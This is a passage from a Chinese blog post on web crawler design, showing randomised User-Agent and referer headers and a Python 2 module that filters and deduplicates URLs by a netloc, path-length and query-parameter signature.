    "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
    "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
    "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
    "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
    "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
    ]

    REFERERS = [
    "https://www.baidu.com",
    "http://www.baidu.com",
    "https://www.google.com.hk",
    "http://www.so.com",
    "http://www.sogou.com",
    "http://www.soso.com",
    "http://www.bing.com",
    ]

    default_cookies = {}
    #随机User-Agent.
    default_headers = {
        'User-Agent': random.choice(USER_AGENTS),
        'Accept': 'Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Cache-Control': 'max-age=0',
        'referer': random.choice(REFERERS),
        'Accept-Charset': 'GBK,utf-8;q=0.7,*;q=0.3',
    }

然后依旧是过滤的问题,就是相似度检查~然后有效的爬虫,这样得到的结果可以更加精准一些。这个算法主要是依靠对URL的拆解与对拆解对象的HASH,这个算法适用类似的需求常见。这个算法是将一个URL拆解为三个维度,第一个维度是netloc,第二个维度是path的各项长度,第三个维度是query对象的参数排序后列表。通过一个数据结构对以上三个维度组合,构建一个可hash的对象。[来自:http://drops.wooyun.org/tips/5462]

#!/usr/bin/env python
# coding:utf-8
import time
import os
import urlparse
import hashlib
import sys
sys.path.append("..")

from config.config import *
reload(sys) 
sys.setdefaultencoding("utf-8") 

SIMILAR_SET = set()
REPEAT_SET = set()

'''
2015.3.30
分清楚爬虫 什么是聚焦 什么是过滤
聚焦:  如果keyword在url则返回True 否则返回False

过滤:  如果keyword在url则返回False 否则返回True
'''


def format(url):
    '''
    策略是构建一个三元组
    第一项为url的netloc
    第二项为path中每项的拆分长度
    第三项为query的每个参数名称(参数按照字母顺序排序,避免由于顺序不同而导致的重复问题)
    '''
    if urlparse.urlparse(url)[2] == '':
        url = url+'/'

    url_structure = urlparse.urlparse(url)
    netloc = url_structure[1]
    path = url_structure[2]
    query = url_structure[4]
    
    temp = (netloc,tuple([len(i) for i in path.split('/')]),tuple(sorted([i.split('=')[0] for i in query.split('&')])))
    #print temp
    return temp


def check_netloc_is_ip(netloc):
    '''
    如果url的netloc为ip形式
    return True
    否则
    return False
    '''
    flag =0
    t = netloc.split('.')
    for i in t:
        try:
            int(i)
            flag += 1
        except Exception, e:
            break
    if flag == 4:
        return True
    
    return False

def url_domain_control(url,keyword):
    '''
    URL域名控制  聚焦

    True url符合域名判断
    False url不符合域名判断

    1,keyword可以是list或者str
    2,如果url的netloc为ip形式,return True

    '''
    t = format(url)
    if check_netloc_is_ip(t[0]):
        return True

    elif str(type(keyword)) == "<type 'list'>":
        for i in keyword:
            if i.lower() in t[0].lower():
                return True

    elif str(type(keyword)) == "<type 'str'>":
        if keyword.lower() in t[0].lower():
            return True
    return False

def url_domain_control_ignore(url,keyword):
    '''
    URL域名控制  过滤

    True 忽略关键字不在url中
    False 忽略关键字在url中

    例如:
    忽略blog,如果域名的netloc内有blog,则返回false
    '''
    t = format(url)
    for i in keyword:
        if i in t[0].lower():
            return False
    return True

def url_similar_control(url):
    '''
    URL相似性控制
    
    True url未重复
    False url重复
    '''
    t = format(url)
    if t not in SIMILAR_SET:
        SIMILAR_SET.add(t)
        return True
    return False


def url_format_control(url):
    '''
    URL格式控制  过滤

    True url符合格式判断
    False url不符合格式判断
    '''

    if '}' not in url and '404' not in url and url[0].lower() == 'h' and '/////' not in url and len(format(url)[1]) < 6:
        if len(format(url)[2]) > 0:
            for i in format(url)[2]:
                if len(i) > 20:
                    return False
        if 'viewthread' in url or 'forumdisplay' in url:
            return False
        return True
    return False

def url_custom_control(url):
    '''
    URL自定义关键字控制  过滤
    True 
    False
    '''
    for i in CUSTOM_KEY:
        if i in url:
            return False
    return True

def url_custom_focus_control(url,focuskey):
    '''
    URL自定义关键字控制  聚焦
    True 符合聚焦策略
    False
    '''
    if len(focuskey) == 0:
        return True
    for i in focuskey:
        if i in url:
            return True
    return False

def url_repeat_control(url):
    '''
    URL重复控制

    True url未重复
    False url重复
    '''
    if url not in REPEAT_SET:
        REPEAT_SET.add(url)
        return True
    return False

def url_filter_similarity(url,keyword,ignore_keyword,focuskey):
    if url_format_control(url) and url_similar_control(url) \
                and url_domain_control(url,keyword) and url_domain_control_ignore(url,IGNORE_KEY_WORD) \
                    and url_custom_control(url) and url_custom_focus_control(url,focuskey):
        return True
    else:
        return False
def url_filter_no_similarity(url,keyword,ignore_keyword,focuskey):
    if url_format_control(url) and url_repeat_control(url) \
                and url_domain_control(url,keyword) and url_domain_control_ignore(url,IGNORE_KEY_WORD) \
                    and url_custom_control(url) and url_custom_focus_control(url,focuskey):
        return True
    else:
        return False


if __name__ == "__main__": 
    print url_format_control("http://www.gznu.edu.cn")

 

分类
最新文章
最近回复
  • 没穿底裤: hook execve函数
  • tuhao lam: 大佬,还有持续跟进Linux命令执行记录这块吗?通过内核拦截exec系统调用的方式,目前有没有...
  • 纸条: 谢谢,大佬。我要拿去抄作业了!
  • 没穿底裤: 稳定运行了大半年
  • ppx: 兄弟做得咋样了?